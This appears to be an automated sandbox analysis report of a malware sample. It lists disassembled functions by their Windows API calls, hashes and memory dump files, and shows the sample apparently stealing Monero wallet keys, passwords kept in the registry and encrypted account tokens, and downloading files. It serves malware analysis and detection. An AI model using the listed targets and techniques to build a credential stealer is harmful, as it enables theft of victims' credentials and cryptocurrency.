                                      • Part of subcall function 00FE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FE9A11
                                      • Part of subcall function 00FE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FE9A31
                                      • Part of subcall function 00FE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FE148F,00000000), ref: 00FE9A5A
                                      • Part of subcall function 00FE99C0: LocalFree.KERNEL32(00FE148F), ref: 00FE9A90
                                      • Part of subcall function 00FE99C0: CloseHandle.KERNEL32(000000FF), ref: 00FE9A9A
                                      • Part of subcall function 00FF93C0: GlobalAlloc.KERNEL32(00000000,00FF43DD,00FF43DD), ref: 00FF93D3
                                    • StrStrA.SHLWAPI(?,0180E578), ref: 00FF43F3
                                    • GlobalFree.KERNEL32(?), ref: 00FF4512
                                      • Part of subcall function 00FE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FE4EEE,00000000,00000000), ref: 00FE9AEF
                                      • Part of subcall function 00FE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FE4EEE,00000000,?), ref: 00FE9B01
                                      • Part of subcall function 00FE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FE4EEE,00000000,00000000), ref: 00FE9B2A
                                      • Part of subcall function 00FE9AC0: LocalFree.KERNEL32(?,?,?,?,00FE4EEE,00000000,?), ref: 00FE9B3F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF44A3
                                    • StrCmpCA.SHLWAPI(?,010008D1), ref: 00FF44C0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FF44D2
                                    • lstrcat.KERNEL32(00000000,?), ref: 00FF44E5
                                    • lstrcat.KERNEL32(00000000,01000FB8), ref: 00FF44F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: 086bdefe038c5ba7b995b98ec972c6633593c366d8384dd14fd8a91dce6a93cd
                                    • Instruction ID: b9b7354e6d68dd9a7bf11ca0afffcad52839e42a98b206a14d125b288a42966d
                                    • Opcode Fuzzy Hash: 086bdefe038c5ba7b995b98ec972c6633593c366d8384dd14fd8a91dce6a93cd
                                    • Instruction Fuzzy Hash: 687145B6900208B7DB24EFA0DC89FEE7379BF48700F044598F60597585EA78EB45DBA1
                                    Function 00FE1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FE12B4
                                      • Part of subcall function 00FE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00FE12BB
                                      • Part of subcall function 00FE12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FE12D7
                                      • Part of subcall function 00FE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FE12F5
                                      • Part of subcall function 00FE12A0: RegCloseKey.ADVAPI32(?), ref: 00FE12FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FE134F
                                    • lstrlen.KERNEL32(?), ref: 00FE135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00FE1377
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FF8B60: GetSystemTime.KERNEL32(01000E1A,0180A988,010005AE,?,?,00FE13F9,?,0000001A,01000E1A,00000000,?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FF8B86
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00FE1465
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE99EC
                                      • Part of subcall function 00FE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FE9A11
                                      • Part of subcall function 00FE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FE9A31
                                      • Part of subcall function 00FE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FE148F,00000000), ref: 00FE9A5A
                                      • Part of subcall function 00FE99C0: LocalFree.KERNEL32(00FE148F), ref: 00FE9A90
                                      • Part of subcall function 00FE99C0: CloseHandle.KERNEL32(000000FF), ref: 00FE9A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FE14EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: 619cb3a88f66837dfbf899c861b3d6b345ef62e1730e349b61d824040972b4c9
                                    • Instruction ID: ae31ef0cfe6f5f779eda1672055e14a377c5ebb211430e2c8eb83aef330bf681
                                    • Opcode Fuzzy Hash: 619cb3a88f66837dfbf899c861b3d6b345ef62e1730e349b61d824040972b4c9
                                    • Instruction Fuzzy Hash: 96512FB195011D97CB25FB60DC96AFD733CAF54300F4041A8B70EA6091EE786B89DBA6
                                    Function 00FE75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FE72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FE733A
                                      • Part of subcall function 00FE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FE73B1
                                      • Part of subcall function 00FE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FE740D
                                      • Part of subcall function 00FE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00FE7452
                                      • Part of subcall function 00FE72D0: HeapFree.KERNEL32(00000000), ref: 00FE7459
                                    • lstrcat.KERNEL32(00000000,010017FC), ref: 00FE7606
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FE7648
                                    • lstrcat.KERNEL32(00000000, : ), ref: 00FE765A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FE768F
                                    • lstrcat.KERNEL32(00000000,01001804), ref: 00FE76A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00FE76D3
                                    • lstrcat.KERNEL32(00000000,01001808), ref: 00FE76ED
                                    • task.LIBCPMTD ref: 00FE76FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: b1ab45c81dd23d8a275d60dcbdcf7d5fce86665ee3edbda46499452ab01447ea
                                    • Instruction ID: 89311b3ffb5288bf11488202b1b80be50a99e18e92aefa57e6e8db9b0c41f576
                                    • Opcode Fuzzy Hash: b1ab45c81dd23d8a275d60dcbdcf7d5fce86665ee3edbda46499452ab01447ea
                                    • Instruction Fuzzy Hash: B9315E76900249EFCB25FFA5EC89DFE7374BB44301B104118F106A7A84DB78AA46DB51
                                    Function 00FE60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FE4839
                                      • Part of subcall function 00FE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FE4849
                                    • InternetOpenA.WININET(01000DF7,00000001,00000000,00000000,00000000), ref: 00FE610F
                                    • StrCmpCA.SHLWAPI(?,0180EB30), ref: 00FE6147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00FE618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FE61B3
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00FE61DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FE620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00FE6249
                                    • InternetCloseHandle.WININET(?), ref: 00FE6253
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE6260
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: f2b7e28d7dfa261719708fa5ad625c2bd80b0003eaeb3e5bb69e8f910b128ead
                                    • Instruction ID: d7b5ba287e879cc52f8f01c0386d4b13c44aee6107195caa2fab9badea9f9c77
                                    • Opcode Fuzzy Hash: f2b7e28d7dfa261719708fa5ad625c2bd80b0003eaeb3e5bb69e8f910b128ead
                                    • Instruction Fuzzy Hash: 13517DB190020CABDF24DF51DC49BEE77B8EB44741F108098E70AA71C4DBB86A89DF95
                                    Function 00FE72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FE733A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FE73B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FE740D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FE7452
                                    • HeapFree.KERNEL32(00000000), ref: 00FE7459
                                    • task.LIBCPMTD ref: 00FE7555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: 00365c56848ee4e237e8311cf0402f9bb49fe92cbd8cc2efe32e78462731b1ea
                                    • Instruction ID: f79159f6969b07af36222b7f980870cf97ae1d50980926492aa281b64643b90c
                                    • Opcode Fuzzy Hash: 00365c56848ee4e237e8311cf0402f9bb49fe92cbd8cc2efe32e78462731b1ea
                                    • Instruction Fuzzy Hash: F6614CB1C042989BDB24EF51DC45BD9B7B8BF44340F0081E9E689A6185EBB45FC9DFA0
                                    Function 00FEBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                    • lstrlen.KERNEL32(00000000), ref: 00FEBC9F
                                      • Part of subcall function 00FF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FF8E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00FEBCCD
                                    • lstrlen.KERNEL32(00000000), ref: 00FEBDA5
                                    • lstrlen.KERNEL32(00000000), ref: 00FEBDB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 18b0736d71222401d1e22b11036e84caca438368c9555d8709a793915e172a09
                                    • Instruction ID: 9d47257170d64ef1fa4f3643b730c14005e5531f4c8fa621c69c3dcb1fd79044
                                    • Opcode Fuzzy Hash: 18b0736d71222401d1e22b11036e84caca438368c9555d8709a793915e172a09
                                    • Instruction Fuzzy Hash: D6B168B191010CABDF14FBA0DC56DFE7338AF54300F404168F60AA75A5EF786A59DB62
                                    Function 00FF6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: 214fb27a55fd2785a03208f59452490b1a7a6884bb43f803fff230defa7bc627
                                    • Instruction ID: 11ce890cd2a8377642af081239922d11ffe6fa6c71383227000600081622286e
                                    • Opcode Fuzzy Hash: 214fb27a55fd2785a03208f59452490b1a7a6884bb43f803fff230defa7bc627
                                    • Instruction Fuzzy Hash: CCF03A31904209FFD368AFE0B50D72CBB70FB14702F040198E60AC7A84EE704A419B99
                                    Function 00FE4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FE4FCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FE4FD1
                                    • InternetOpenA.WININET(01000DDF,00000000,00000000,00000000,00000000), ref: 00FE4FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00FE5011
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00FE5041
                                    • InternetCloseHandle.WININET(?), ref: 00FE50B9
                                    • InternetCloseHandle.WININET(?), ref: 00FE50C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: c7ee6c432dbb64ac3b2e5369dbeb74bef794f3467864109fa7ac29cf05db5bdf
                                    • Instruction ID: b8f1d51e80fdb281ca33822c261a70ba19d001b78d1b8149f83c3bb5092d90e4
                                    • Opcode Fuzzy Hash: c7ee6c432dbb64ac3b2e5369dbeb74bef794f3467864109fa7ac29cf05db5bdf
                                    • Instruction Fuzzy Hash: C03119B5A00218ABDB24CF54DC89BDCB7B5EB48704F1081D9F709A7285C7746EC59F98
                                    Function 00FF8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0180E020,00000000,?,01000E2C,00000000,?,00000000), ref: 00FF8130
